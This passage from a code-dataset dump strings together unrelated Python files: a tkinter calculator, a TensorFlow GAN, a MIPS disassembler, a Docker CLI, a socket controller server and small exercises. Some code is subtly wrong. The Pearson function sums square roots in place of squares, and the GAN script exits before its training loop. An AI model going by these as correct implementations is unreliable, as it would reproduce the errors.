We don't need this.\ntest3 = test3.drop(columns=['All'])\nfor file in list(test3.columns.values):\n test3[file].replace([0,1],['',file],inplace=True)\n\nchale1=test3.apply(lambda x: x.tolist(), axis=1)\n","sub_path":"introds/introds/hw/l1/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"458952225","text":"cdtest = 0\ncduptime = 0\ncdcommands = 0\ncdgarbo = 0\ncdtagface = 0\ncdfaq = 0\ncdmemes = 0\ncdkirby = 0\ncduuptime = 0\ncdimportant = 0\ncdwr = 0\ncdcandy = 0\ncdsellout = 0\ncdtjfreak = 0\ncdkeyboard = 0\ncdwannabes = 0\ncd = 0\n","sub_path":"cd.py","file_name":"cd.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"613630403","text":"# urllib 的封装\nimport requests\n\nurl = \"http://www.baidu.com/s?\"\n\nparams = {\"wd\":\"笔记本\"}\nheaders = {\n \"User-Agent\":\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)\"\n}\n# get == urllib.request.urlopen\nresponse = requests.get(url,params=params,headers=headers)\n# \n# \nprint(response)\nprint(type(response))\n# 获取字节数据 == read()\nhtmlBytes = response.content\n# 解码\nprint(htmlBytes.decode())","sub_path":"0604/5.requests第三方库的使用.py","file_name":"5.requests第三方库的使用.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"413098637","text":"import tkinter as tk\nimport parser # Used for conversion of string to expressions\nroot = tk.Tk()\nroot.title(\"calculator\")\n\ni = 0\n\n# ===============================================================================================================\n\n\n# Step 2\n# Creating functionality for inserting button values to entry form\n\n\ndef insertValueToEntryForm(num):\n global i\n display.insert(i, num) # Takes (index position, value)\n i += 1\n\n\n# Creating functionality for clear\ndef clear():\n display.delete(0, tk.END) # Takes (starting position, ending position)\n\n\n# Creating functionality for undo function\n# def undo():\n# string = display.get() # To get the elements of entry form\n# # print(string)\n# if(string):\n# string = string[:-1]\n# # print(string)\n# clear()\n# display.insert(0, string)\n# else:\n# clear()\n\n\n# Calculating the values\ndef calculate():\n string = display.get()\n try:\n # expr is to convert string in expression and eval to calculate\n result = eval(parser.expr(string).compile())\n # print(result)\n clear()\n display.insert(0, result)\n except Exception:\n clear()\n display.insert(0, \"Error\")\n\n\n# =========================================================================================================================\n# Step 1\n# Creating entry form\ndisplay = tk.Entry(root)\ndisplay.grid(row=0, columnspan=4, sticky=tk.W+tk.E, padx=3, pady=3)\n\n# Creating buttons\ntk.Button(root, text=\"1\", width=5,\n command=lambda: insertValueToEntryForm(1)).grid(row=1, column=0,) # Used lambda because we need to send data to the function\ntk.Button(root, text=\"2\", width=5,\n command=lambda: insertValueToEntryForm(2)).grid(row=1, column=1,)\ntk.Button(root, text=\"3\", width=5,\n command=lambda: insertValueToEntryForm(3)).grid(row=1, column=2,)\n\ntk.Button(root, text=\"4\", width=5,\n command=lambda: insertValueToEntryForm(4)).grid(row=2, column=0,)\ntk.Button(root, text=\"5\", width=5,\n command=lambda: insertValueToEntryForm(5)).grid(row=2, column=1,)\ntk.Button(root, 
text=\"6\", width=5,\n command=lambda: insertValueToEntryForm(6)).grid(row=2, column=2,)\n\ntk.Button(root, text=\"7\", width=5,\n command=lambda: insertValueToEntryForm(7)).grid(row=3, column=0,)\ntk.Button(root, text=\"8\", width=5,\n command=lambda: insertValueToEntryForm(8)).grid(row=3, column=1,)\ntk.Button(root, text=\"9\", width=5,\n command=lambda: insertValueToEntryForm(9)).grid(row=3, column=2,)\n\n# Adding other elements\ntk.Button(root, text=\"AC\", width=5, command=clear).grid(row=4, column=0,)\ntk.Button(root, text=\"0\", width=5,\n command=lambda: insertValueToEntryForm(0)).grid(row=4, column=1,)\ntk.Button(root, text=\"=\", width=5, command=calculate).grid(row=4, column=2,)\n\n# Adding operators\ntk.Button(root, text=\"+\", width=5,\n command=lambda: insertValueToEntryForm('+')).grid(row=1, column=3,)\ntk.Button(root, text=\"-\", width=5,\n command=lambda: insertValueToEntryForm('-')).grid(row=2, column=3,)\ntk.Button(root, text=\"*\", width=5,\n command=lambda: insertValueToEntryForm('*')).grid(row=3, column=3,)\ntk.Button(root, text=\"/\", width=5,\n command=lambda: insertValueToEntryForm('/')).grid(row=4, column=3,)\n\n\nroot.mainloop()\n","sub_path":"src/gui/projects/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"483228643","text":"import numpy as np\nfrom scipy.stats import norm\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport copy\n\nseed = 42\nnp.random.seed(seed)\ntf.set_random_seed(seed)\n\n# real data\nclass DataDistribution(object):\n def __init__(self, N=1000):\n self.mu = 4\n self.sigma = 0.5\n\n def sample(self, N):\n samples = np.random.normal(self.mu, self.sigma, N)\n samples.sort()\n return samples\n\n def batch(self, batch_size=10):\n sample_size = self.samples.shape[0]\n batch_mask = np.random.choice(sample_size, batch_size)\n return batch_mask\n\nclass GeneratorDistribution(object):\n def __init__(self, range):\n self.range = range\n\n def sample(self, N):\n return np.linspace(-self.range, self.range, N) + \\\n np.random.random(N) * 0.01\n\n# dataset parameter\nmu = 4\nsigma = 0.5\n\n# trainning parameter\ninitial_learning_rate = 0.005\nbatch = tf.Variable(0)\ndecay = 0.95\nnum_decay_steps = 150\n\n# 학습이 안되다가, 이 구문 추가하니까 pre_train 수렴\nlearning_rate = tf.train.exponential_decay(\n initial_learning_rate,\n batch,\n num_decay_steps,\n decay,\n staircase=True\n )\nepoch = 5\nbatch_size = 10\n\n# network parameter\nn_hidden = 4\nn_input = 1\nn_classes = 1\n\n# generator\ndef generator(x, weights, biases):\n layer_1 = tf.add(tf.matmul(x, weights['g_layer1']), biases['g_b1'])\n layer_1 = tf.nn.softplus(layer_1)\n layer_2 = tf.add(tf.matmul(layer_1, weights['g_layer2']), biases['g_b2'])\n layer_2 = tf.nn.softplus(layer_2)\n\n out_layer = tf.matmul(layer_2, weights['g_out']) + biases['g_bout']\n return out_layer\n\n# discriminator\ndef pre_discriminator(x, weights, biases):\n layer_1 = tf.add(tf.matmul(x, weights['pre_d_layer1']), biases['pre_d_b1'])\n layer_1 = tf.tanh(layer_1)\n layer_2 = tf.add(tf.matmul(layer_1, weights['pre_d_layer2']), biases['pre_d_b2'])\n layer_2 = tf.tanh(layer_2)\n layer_3 = tf.add(tf.matmul(layer_2, weights['pre_d_layer3']), biases['pre_d_b3'])\n layer_3 = tf.tanh(layer_3)\n\n out_layer = tf.matmul(layer_3, weights['pre_d_outlayer']) + biases['pre_d_bout']\n out_layer = tf.sigmoid(out_layer)\n return out_layer\n\ndef discriminator_d(x, weights, biases):\n layer_1 = 
tf.add(tf.matmul(x, weights['d_layer1']), biases['d_b1'])\n layer_1 = tf.tanh(layer_1)\n layer_2 = tf.add(tf.matmul(layer_1, weights['d_layer2']), biases['d_b2'])\n layer_2 = tf.tanh(layer_2)\n layer_3 = tf.add(tf.matmul(layer_2, weights['d_layer3']), biases['d_b3'])\n layer_3 = tf.tanh(layer_3)\n\n out_layer = tf.matmul(layer_3, weights['d_outlayer']) + biases['d_bout']\n out_layer = tf.sigmoid(out_layer)\n return out_layer\n\n# Store layers weight & bias\nweights = {\n 'pre_d_layer1': tf.Variable(tf.random_normal([n_input, n_hidden])),\n 'pre_d_layer2': tf.Variable(tf.random_normal([n_hidden, n_hidden])),\n 'pre_d_layer3': tf.Variable(tf.random_normal([n_hidden, n_hidden])),\n 'pre_d_outlayer': tf.Variable(tf.random_normal([n_hidden, n_classes])),\n\n 'd_layer1': tf.Variable(tf.random_normal([n_input, n_hidden])),\n 'd_layer2': tf.Variable(tf.random_normal([n_hidden, n_hidden])),\n 'd_layer3': tf.Variable(tf.random_normal([n_hidden, n_hidden])),\n 'd_outlayer': tf.Variable(tf.random_normal([n_hidden, n_classes])),\n\n 'g_layer1': tf.Variable(tf.random_normal([n_input, n_hidden])),\n 'g_layer2': tf.Variable(tf.random_normal([n_hidden, n_hidden])),\n 'g_out': tf.Variable(tf.random_normal([n_hidden, n_classes]))\n}\n\nbiases = {\n 'pre_d_b1': tf.Variable(tf.random_normal([n_hidden])),\n 'pre_d_b2': tf.Variable(tf.random_normal([n_hidden])),\n 'pre_d_b3': tf.Variable(tf.random_normal([n_hidden])),\n 'pre_d_bout': tf.Variable(tf.random_normal([n_classes])),\n\n 'd_b1': tf.Variable(tf.random_normal([n_hidden])),\n 'd_b2': tf.Variable(tf.random_normal([n_hidden])),\n 'd_b3': tf.Variable(tf.random_normal([n_hidden])),\n 'd_bout': tf.Variable(tf.random_normal([n_classes])),\n\n 'g_b1': tf.Variable(tf.random_normal([n_hidden])),\n 'g_b2': tf.Variable(tf.random_normal([n_hidden])),\n 'g_bout': tf.Variable(tf.random_normal([n_classes]))\n}\n\n# PreTrained Discriminative Model\npre_input = tf.placeholder(tf.float32, shape=(batch_size, 1))\npre_labels = tf.placeholder(tf.float32, shape=(batch_size, 1))\npre_d = pre_discriminator(pre_input, weights, biases)\n\npre_loss = tf.reduce_mean(tf.square(pre_labels - pre_d))\npre_opt = tf.train.GradientDescentOptimizer(learning_rate).minimize(pre_loss)\n\n# Generative Model\nz = tf.placeholder(tf.float32, shape=(batch_size, 1))\nG = generator(z, weights, biases)\n\n# Discriminative Model\n\nx = tf.placeholder(tf.float32, shape=(batch_size, 1))\nD1 = discriminator_d(x, weights, biases)\nD2 = discriminator_d(G, weights, biases)\n\nloss_d = tf.reduce_mean(-tf.log(D1) - tf.log(1-D2))\nloss_g = tf.reduce_mean(-tf.log(D2))\n\nopt_d = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss_d)\nopt_g = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss_g)\n\n# Initializing the variables\ninit = tf.global_variables_initializer()\n\ndataset = DataDistribution()\nnum_steps = 1200\n\ndata = DataDistribution()\ngen = GeneratorDistribution(range=8)\n\nresult = []\nright_data = []\npre_train_right_data = []\n# Launch the graph\nwith tf.Session() as sess:\n sess.run(init)\n\n # pretraining discriminator\n num_pretrain_steps = 2000\n print(\"Pre Train--------------------------------------------------------------------------------------------------\")\n for step in range(num_pretrain_steps):\n print(\"-------------------------------------------------------------------------------------------------------\")\n d = (np.random.random(batch_size) -0.5) * 10\n labels = norm.pdf(d, loc = mu, scale = sigma)\n print(d)\n print(labels)\n pretrain_loss, _ = 
sess.run([pre_loss, pre_opt], {\n pre_input : np.reshape(d, (batch_size, 1)),\n pre_labels : np.reshape(labels, (batch_size, 1))\n })\n\n print(\"epoch {} : cost : {}\".format(step, pretrain_loss))\n print(\"-------------------------------------------------------------------------------------------------------\")\n print(\"Finished Pre Train ----------------------------------------------------------------------------------------\")\n print(\"mu : {}\".format(mu))\n print(\"sigma : {}\".format(sigma))\n for i in range(0,5):\n validate_d = (np.random.random(batch_size) - 0.5) * 10\n validate_labels = norm.pdf(validate_d, loc=mu, scale=sigma)\n pre_train_result = sess.run([pre_d], {\n pre_input : np.reshape(validate_d, (batch_size, 1))\n })\n\n print(validate_d)\n print(validate_labels)\n print(pre_train_result)\n exit()\n print()\n print()\n # copy weights\n # test copy data\n print(\"Copy weights and biases -----------------------------------------------------------------------------------\")\n\n weights['d_layer1'].assign(weights['pre_d_layer1'])\n weights['d_layer2'].assign(weights['pre_d_layer2'])\n weights['d_layer3'].assign(weights['pre_d_layer3'])\n weights['d_outlayer'].assign(weights['pre_d_outlayer'])\n\n # copy bias\n biases['d_b1'].assign(biases['pre_d_b1'])\n biases['d_b2'].assign(biases['pre_d_b2'])\n biases['d_b3'].assign(biases['pre_d_b3'])\n biases['d_bout'].assign(biases['pre_d_bout'])\n\n print(\"Finished weights and biases -------------------------------------------------------------------------------\")\n\n # update discriminator\n for step in range(num_steps):\n right = data.sample(batch_size)\n random = gen.sample(batch_size)\n\n loss_disciminator, _ = sess.run([loss_d, opt_d], {\n x : np.reshape(right, (batch_size, 1)),\n z : np.reshape(random, (batch_size, 1))\n })\n\n # update generator\n random = gen.sample(batch_size)\n\n loss_generator, _ = sess.run([loss_g, opt_g], {\n z: np.reshape(random, (batch_size, 1))\n })\n\n if step% 10 == 0:\n print('epoch {}: loss d -> {}\\t\\tloss_g -> {}'.format(str(step), str(loss_disciminator), str(loss_generator)))\n\n\n random = gen.sample(batch_size)\n data = sess.run([G],{\n z : np.reshape(random, (batch_size, 1))\n })\n result.append(data)\n\n print(\"Check Weights and Biases : \")\n print(\"pre_d_layer1 : {}\".format(str(sess.run(weights['pre_d_layer1']))))\n print(\"pre_d_layer2 : {}\".format(str(sess.run(weights['pre_d_layer2']))))\n print(\"pre_d_outlayer : {}\".format(str(sess.run(weights['pre_d_outlayer']))))\n print()\n print(\"d1_layer1 : {}\".format(str(sess.run(weights['d_layer1']))))\n print(\"d1_layer2 : {}\".format(str(sess.run(weights['d_layer2']))))\n print(\"d1_outlayer : {}\".format(str(sess.run(weights['d_outlayer']))))\n print()\n print(\"g1 : {}\".format(str(sess.run(weights['g_layer1']))))\n print(\"g2 : {}\".format(str(sess.run(weights['g_layer2']))))\n print(\"g_out : {}\".format(str(sess.run(weights['g_out']))))\n print()\n\n\nprint(\"-------------------------------------------\")\nright_data = dataset.sample(10)\nprint(right_data)\nprint(\"-------------------------------------------\")\nprint(result)\n","sub_path":"test/discriminator.py","file_name":"discriminator.py","file_ext":"py","file_size_in_byte":9204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"393733944","text":"from math import sqrt\n\n\ndef pcs(v1, v2):\n n = len(v1)\n\n # 按人计算评分数的和\n sum_a = sum(v1)\n sum_b = sum(v2)\n\n # 计算平方的和\n sum_a_sq = sum([sqrt(item) for item in v1])\n 
sum_b_sq = sum([sqrt(item) for item in v2])\n\n # 计算乘积和\n p_sum = sum([v1[idx] * v2[idx] for idx in range(len(v1))])\n\n # 计算皮尔逊相关度\n num = p_sum - (sum_a * sum_b / n)\n\n result = (sum_a_sq - pow(sum_a, 2) / n) * (sum_b_sq - pow(sum_b, 2) / n)\n\n if result <= 0:\n return 0\n\n den = sqrt(result)\n if den == 0:\n return 0\n\n return 1.0 - num / den\n","sub_path":"c3/Score.py","file_name":"Score.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"418191858","text":"import pyxinput\nfrom PropertiesReader import PropertiesReader\nfrom threading import Thread\nimport json\n\nclass ServerExecutor(Thread):\n\n prop_reader = PropertiesReader(\"prop.json\")\n PACKET_LENGTH = 170 # in bytes\n\n def __init__(self, socket, id_controller):\n super().__init__()\n self.socket = socket\n self.id_controller = id_controller\n self.events_code = ServerExecutor.prop_reader.props()\n def __str__(self):\n return self.socket.getsockname()\n\n def run(self):\n virtualController = pyxinput.vController() # initialize virtual controller\n\n dataJson = self.socket.recv(ServerExecutor.PACKET_LENGTH)\n self.socket.send(\"1\".encode())\n while(dataJson):\n data = json.loads(dataJson)\n decoded_code = self.events_code[data[\"event_code\"]]\n virtualController.set_value(decoded_code, data[\"event_state\"])\n \n print(\"[Controller-ID #{}] Ping precedent packet: {} milliseconds\".format(self.id_controller, data[\"previous_ping\"]))\n dataJson = self.socket.recv(ServerExecutor.PACKET_LENGTH)\n self.socket.send(\"1\".encode())\n else:\n print(\"[INFO] Connection with {} interrupted.\".format(self.id_controller))","sub_path":"ServerExecutor.py","file_name":"ServerExecutor.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"119824945","text":"\nimport spacy\nfrom fastapi import APIRouter, Body, Depends\nfrom pydantic import BaseModel, Field\n\nrouter = APIRouter()\n\n\nclass Mensaje(BaseModel):\n texto: str\n\n\nclass Consulta(BaseModel):\n pregunta: str\n texto: str\n\n\n@router.post(\"/entidades\", response_description=\"NLP data retrieved\")\nasync def get_entidades_from_texto(mensaje: Mensaje):\n nlp = spacy.load(\"es_core_news_sm\")\n entidades = []\n\n doc = nlp(mensaje.texto[11:])\n\n for token in doc:\n if token.tag_ == \"PROPN\" and token.pos_ == \"PROPN\" and len(token.shape_) >= 4:\n entidades.append(token.text)\n # entidades.append(\n # {token.text: {\"tag\": token.tag_, \"pos\": token.pos_, \"shape\": token.shape_}})\n\n return {\n \"Entidades\": entidades,\n \"Mensaje Resultante\": ' '.join(str(e) for e in entidades),\n \"Mensaje Inicial\": mensaje.texto,\n }\n\n","sub_path":"server/routes/nlp.py","file_name":"nlp.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"320119439","text":"#MRMenu = {}\n\n#signal = input(\"Type here: \")\n#data = input(\"Data here: \")\n\n\n#MRMenu[signal] = data\n#print(MRMenu[signal])\n\n\n#for x, y in MRMenu.items():\n# print(x, y) \n\nWaifu = {}\n\n# because git told me to :(\n\nfor i in range(0,5):\n potato = input(\"This is a potato\")\n Waifu[i] = potato\n\nfor x,y in Waifu.items():\n 
print(x,y)\n","sub_path":"dictionary-test/dictionary_test.py","file_name":"dictionary_test.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"191961026","text":"__author__ = 'Benco'\nclass Solution:\n # @param s, a string\n # @return a boolean\n def isPalindrome(self, s):\n s1=''\n for i in range(len(s)):\n if (s[i].upper()>='A' and s[i].upper()<='Z') or (s[i]>='0' and s[i]<='9'):\n s1+=s[i].upper()\n #print(s1)\n s2=s1[::-1]\n if s1==s2:\n return True\n else:\n return False\n\nif __name__==\"__main__\":\n s=Solution()\n print(s.isPalindrome('aA'))","sub_path":"Valid Palindrome.py","file_name":"Valid Palindrome.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"357470797","text":"from stuubehoggr.core import ConfigurationParser\nfrom stuubehoggr import commands\nfrom stuubehoggr.utils import logger\nimport logging\nimport sys\nimport click\n\n\n@click.group()\n@click.option('--log-level', '-l', type=click.Choice(['INFO', 'DEBUG', 'WARNING',\n 'ERROR', 'CRITICAL']), default='CRITICAL')\ndef cli(log_level):\n logger.setLevel(getattr(logging, log_level))\n\n\ndef run_command(command, cwd, name, reverse=False, muted=False):\n # Parse the configuration\n parser = ConfigurationParser(cwd)\n parser.parse()\n\n # Initialize the command\n docker_client = commands.create_default_docker_client()\n cmd = command(docker_client)\n\n containers = parser.container_list[:]\n if reverse:\n containers = reversed(containers)\n\n # Find the container with the given name and run it.\n for current in containers:\n try:\n if name is None or current['name'] == name:\n if cmd.run(current):\n if not muted:\n log_operation_complete(command.name, current['name'])\n else:\n # TODO: the run method shall return nothing. 
Failure\n # must ALWAYS result in an exception!\n log_error(command.name, current['name'], None)\n sys.exit(1)\n except Exception as e:\n log_error(command.name, current['name'], e)\n sys.exit(1)\n\n # TODO: handle nonexistent container...\n\n\n@cli.command()\n@click.argument('container', required=False)\n@click.option('--working-directory', '-d', type=click.Path(exists=True),\n default='./')\ndef stop(container, working_directory):\n run_command(commands.StopCommand, working_directory, container,\n reverse=True)\n\n\n@cli.command()\n@click.argument('container', required=False)\n@click.option('--working-directory', '-d', type=click.Path(exists=True),\n default='./')\ndef start(container, working_directory):\n run_command(commands.StartCommand, working_directory, container)\n\n\n@cli.command()\n@click.argument('container', required=False)\n@click.option('--working-directory', '-d', type=click.Path(exists=True),\n default='./')\ndef build(container, working_directory):\n run_command(commands.BuildCommand, working_directory, container)\n\n\n@cli.command()\n@click.argument('container', required=False)\n@click.option('--working-directory', '-d', type=click.Path(exists=True),\n default='./')\ndef launch(container, working_directory):\n run_command(commands.LaunchCommand, working_directory, container)\n\n\n@cli.command()\n@click.argument('container', required=False)\n@click.option('--working-directory', '-d', type=click.Path(exists=True),\n default='./')\ndef destroy(container, working_directory):\n run_command(commands.DestroyCommand, working_directory, container,\n reverse=True)\n\n\n@cli.command()\n@click.argument('container', required=False)\n@click.option('--working-directory', '-d', type=click.Path(exists=True),\n default='./')\ndef backup(container, working_directory):\n run_command(commands.BackupCommand, working_directory, container)\n\n\n@cli.command()\n@click.argument('container', required=False)\n@click.option('--working-directory', '-d', type=click.Path(exists=True),\n default='./')\ndef restore(container, working_directory):\n run_command(commands.RestoreCommand, working_directory, container)\n\n\n@cli.command()\n@click.argument('container', required=False)\n@click.option('--working-directory', '-d', type=click.Path(exists=True),\n default='./')\ndef bootstrap(container, working_directory):\n run_command(commands.StopCommand, working_directory, container,\n reverse=True, muted=True)\n run_command(commands.BackupCommand, working_directory, container,\n reverse=True, muted=True)\n run_command(commands.DestroyCommand, working_directory, container,\n reverse=True, muted=True)\n run_command(commands.BootstrapCommand, working_directory, container)\n\n\n# Special commands\n\n@cli.command(name='list')\n@click.option('--working-directory', '-d', type=click.Path(exists=True),\n default='./')\n@click.option('--reverse', default=False, is_flag=True)\ndef listAll(working_directory, reverse):\n parser = ConfigurationParser(working_directory)\n parser.parse()\n containers = parser.container_list[:]\n if reverse:\n containers = reversed(containers)\n for container in containers:\n click.echo(container['name'])\n\n\ndef abort_if_false(ctx, param, value):\n if not value:\n ctx.abort()\n\n\n@cli.command()\n@click.option('--yes', is_flag=True, callback=abort_if_false,\n expose_value=False,\n prompt='Are you sure you want to clear all docker related '\n 'data on this system (including all volumes/images etc.)?')\ndef tabularasa():\n # TODO: CONFIRM!\n client = 
commands.create_default_docker_client()\n commands.tabularasa(client)\n\n\n@cli.command()\n@click.argument('container', required=True)\ndef clean(container):\n client = commands.create_default_docker_client()\n commands.cleanup_recursively(client, container)\n\n\ndef log_operation_complete(operation, container_name):\n if logger.getEffectiveLevel() != logging.CRITICAL:\n logger.info('Operation \"%s\" completed for \"%s\"'\n % (operation, container_name))\n else:\n click.echo(container_name, err=True)\n\n\ndef log_error(operation, container_name, exception):\n if logger.getEffectiveLevel() != logging.CRITICAL:\n logger.error('Operation \"%s\" for \"%s\" has failed.'\n % (operation, container_name))\n if exception:\n raise exception\n else:\n click.echo('ERROR: %s' % exception)\n\n\nif __name__ == '__main__':\n cli()\n","sub_path":"src/main/python/stuubehoggr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"116014216","text":"import time\nimport datetime\nimport random\n\nmessages = [\n \"of all the trees we could've hit, we had to get one that hits .\",\n \"If he doesn't stop trying to save your life he's going to kill \"\n]\n\nprint(\"Typing speed test. Type the following message. I will time you\")\ntime.sleep(2)\nprint(\"\\nReady\")\ntime.sleep(1)\nprint(\"\\nSet...\")\ntime.sleep(1)\nprint(\"\\nGo\")\nmessage = random.choice(messages)\nprint(\"\\n\" + message)\nstart_time = datetime.datetime.now()\ntyping = input('>')\nend_time = datetime.datetime.now()\n","sub_path":"speedTest.py","file_name":"speedTest.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"400128216","text":"# To change this license header, choose License Headers in Project Properties.\n# To change this template file, choose Tools | Templates\n# and open the template in the editor.\n\n__author__ = \"Michael Lore \"\n__date__ = \"$Jun 21, 2015 9:41:46 PM$\"\n\nfirst = input(\"Enter a number\")\nnum1 = int(first)\nsecond = input(\"Enter another number\")\nnum2 = int(second)\nsum = num1 + num2\nprint (sum)","sub_path":"codeabbey/sum2/src/sum2.py","file_name":"sum2.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"129675685","text":"\"\"\"\n LeetCode \n By Solmaz Ebrahimi\n \n Longest Palindromic Substring Problem\n https://leetcode.com/problems/longest-palindromic-substring\n \n Time Submitted | Status | Runtime | Memory | Language\n 2020/05/29 | Accepted | 4372 ms\t| 13.8 MB | python3\n\"\"\"\n\n\n\n\nclass Solution:\n def longestPalindrome(self, s: str) -> str:\n \n longest_sub = ''\n \n for i in range(len(s)):\n if (len(s) - i) < len(longest_sub):\n break\n for j in range(i+1, len(s)+1):\n sub = s[i:j]\n if sub == sub[::-1]:\n if len(sub) > len(longest_sub):\n longest_sub = sub \n return longest_sub","sub_path":"5.Longest Palindromic Substring.py","file_name":"5.Longest Palindromic Substring.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"49588933","text":"#在本文件相同路径下存放十六进制机器码文件hex.txt,每条语句一行。\n#直接运行python deassemble.py即可,目前只支持P3课下的8条指令。\ndef hex2bin(hexfile): \n f=open(hexfile,\"r\")\n lines = f.readlines()\n binlines=[]\n binstrs=[]\n for line in lines:\n line = line.split(\"\\n\")[0]\n 
num=\"0x\"+line\n #print(num)\n #print(bin(int(num,16)))\n binlines.append(str(bin(int(num,16))))\n for binstr in binlines:\n binstr=binstr.split(\"b\")[-1];\n i=len(binstr)\n while (i<32):\n binstr = \"0\" + binstr\n i = len(binstr)\n binstrs.append(binstr)\n for binstr in binstrs:\n print(binstr)\n return binstrs\ndef bin2signdec(string): #16为有符号二进制数转换成十进制\n udec = int(string,2)\n strdec = str(udec)\n if(string[0]==\"1\"):\n dec = (~(udec)+1)%65536\n strdec = \"-\" + str(dec)\n return strdec\n#__main__\nbinstrs = hex2bin(\"hex.txt\")\ninstructions = []\nfor binstr in binstrs:\n fields = [];\n fields.append(binstr[0:6])\n fields.append(binstr[6:11])\n fields.append(binstr[11:16])\n fields.append(binstr[16:21])\n fields.append(binstr[21:26])\n fields.append(binstr[26:32])\n if(fields[0]==\"000000\"):\n if(fields[5]==\"100001\"): #ADDU\n instruction = \"addu\"\n rs = str(int(fields[1],2))\n rt = str(int(fields[2],2))\n rd = str(int(fields[3],2))\n instruction = instruction + \" $\" + rd + \" $\" + rs + \" $\" + rt\n instructions.append(instruction)\n elif(fields[5]==\"100011\"): #SUBU\n instruction = \"subu\"\n rs = str(int(fields[1],2))\n rt = str(int(fields[2],2))\n rd = str(int(fields[3],2))\n instruction = instruction + \" $\" + rd + \" $\" + rs + \" $\" + rt\n instructions.append(instruction)\n elif(fields[5]==\"000000\"): #nop\n instructions.append(\"nop\")\n else:\n instructions.append(binstr)\n elif(fields[0]==\"001101\"): #ORI\n instruction = \"ori\"\n rs = str(int(fields[1],2))\n rt = str(int(fields[2],2))\n immediate = str(int(fields[3]+fields[4]+fields[5],2))\n instruction = instruction + \" $\" + rt + \" $\" + rs + \" \" + immediate\n instructions.append(instruction)\n elif(fields[0]==\"100011\"): #lw\n instruction = \"lw\"\n base = str(int(fields[1],2))\n rt = str(int(fields[2],2))\n offset = bin2signdec(fields[3]+fields[4]+fields[5])\n instruction = instruction + \" $\" + rt + \" \" + offset + \"($\" + base + \")\"\n instructions.append(instruction)\n elif(fields[0]==\"101011\"): #sw\n instruction = \"sw\"\n base = str(int(fields[1],2))\n rt = str(int(fields[2],2))\n offset = bin2signdec(fields[3]+fields[4]+fields[5])\n instruction = instruction + \" $\" + rt + \" \" + offset + \"($\" + base + \")\"\n instructions.append(instruction)\n elif(fields[0]==\"001111\"): #lui\n instruction = \"lui\"\n rt = str(int(fields[2],2))\n immediate = str(int(fields[3]+fields[4]+fields[5],2))\n instruction = instruction + \" $\" + rt + \" \" + immediate\n instructions.append(instruction)\n elif(fields[0]==\"000100\"): #beq\n instruction = \"beq\"\n rs = str(int(fields[1],2))\n rt = str(int(fields[2],2))\n offset = bin2signdec(fields[3]+fields[4]+fields[5])\n instruction = instruction + \" $\" + rs + \" $\" + rt + \" \" + offset\n instructions.append(instruction)\n else:\n instructions.append(binstr)\n\nfor instruction in instructions:\n print(instruction)\n \n\n \n","sub_path":"P3/deassemble.py","file_name":"deassemble.py","file_ext":"py","file_size_in_byte":3665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"491587461","text":"from subprocess import check_output\nfrom time import sleep\nfrom datetime import datetime\nfrom RPLCD.i2c import CharLCD\nimport os\n\nlcd = CharLCD('PCF8574', 0x3f, auto_linebreaks=False, cols=16, rows=2)\nlcd.clear()\n\ndef get_ip():\n cmd = \"hostname -I | cut -d\\' \\' -f1\"\n return check_output(cmd, shell=True).decode(\"utf-8\").strip()\nwhile True:\n lcd.clear()\n uptime = os.popen('uptime 
